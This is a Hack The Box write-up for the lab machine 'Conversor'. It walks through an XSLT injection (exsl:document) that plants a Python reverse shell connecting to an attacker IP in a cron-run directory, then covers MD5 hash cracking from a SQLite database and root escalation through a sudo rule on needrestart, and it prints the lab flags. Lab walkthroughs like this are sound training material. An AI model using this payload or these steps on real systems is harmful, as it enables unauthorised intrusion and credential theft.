← ./writeups

Hack The Box

Conversor

HTBEasyLinuxWebPrivEsc

Summary

Conversor is an Easy Linux machine hosting a web app that converts Nmap scans using XML/XSLT. The /about endpoint leaks the source code, revealing an XSLT processor and a cron job that runs any .py file in a scripts directory. An XSLT injection with exsl:document writes a malicious script that the cron job executes, granting a shell as www-data. A local SQLite database yields a crackable MD5 hash for SSH access, and a sudo rule on needrestart is abused to escalate to root.

Machine Information

NameDifficultyOSPlatform
ConversorEasyLinuxHack The Box

Attack Path

  1. Service enumeration reveals HTTP and SSH.
  2. Web enumeration discovers the /about endpoint.
  3. The application source code is downloaded and analyzed.
  4. An XSLT injection (exsl:document) writes a file to the server.
  5. A cron job executes the written script.
  6. A reverse shell is received as www-data.
  7. Credentials are extracted from a SQLite database (MD5).
  8. SSH access is obtained as the user.
  9. A sudo rule on needrestart is abused to escalate to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.22.117

Nmap Scan

PortServiceNotes
22SSHOpenSSH 8.9p1
80HTTPConversor web application

Web Enumeration

The web application accepts XML and XSLT uploads to convert Nmap scans.

Web page

Content discovery was run with Gobuster:

gobuster dir -u http://conversor.htb/ -w /usr/share/wordlists/dirb/common.txt

Gobuster

Key findings:

The /about endpoint was essential, as it provided the application's source code.

Source Code Review

The source code revealed:

install.md contained a cron job:

* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done

In other words, any .py file placed in that directory is executed automatically.

Exploitation — XSLT Injection (exsl:document)

XSLT with the EXSLT exsl:document element can write files to disk during the transformation. This was used to drop a reverse shell into the scripts directory.

<xsl:stylesheet version="1.0"
 xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 xmlns:exsl="http://exslt.org/common"
 extension-element-prefixes="exsl">

<xsl:template match="/">
  <exsl:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.X",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
  </exsl:document>
</xsl:template>

</xsl:stylesheet>

Initial Access

After uploading the payload, the file was written to /scripts, the cron job executed it, and a reverse shell was received as www-data.

nc -lvnp 1234

Shell

A SQLite database was found containing user credentials:

sqlite3 /var/www/conversor.htb/instance/users.db
SELECT * FROM users;

Database hash

The MD5 hash was cracked and reused for SSH:

john --format=raw-md5 hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh fismathack@10.129.22.117

Privilege Escalation

Enumeration

sudo -l

sudo enumeration

(ALL : ALL) NOPASSWD: /usr/sbin/needrestart

Abusing needrestart

The needrestart binary can be abused to execute code as root, which produced a root shell.

Root shell

Flags

User

cat /home/fismathack/user.txt

User flag

00f53b8888ecdc8814a01c18dd67f289

Root

cat /root/root.txt

Root flag

36003125b473a0efc65cd596ac974152

Vulnerabilities Identified

XSLT Injection → Arbitrary File Write → RCE

Impact: remote code execution as www-data.

Misconfigured sudo (needrestart)

Impact: privilege escalation to root.

Tools Used

Key Takeaways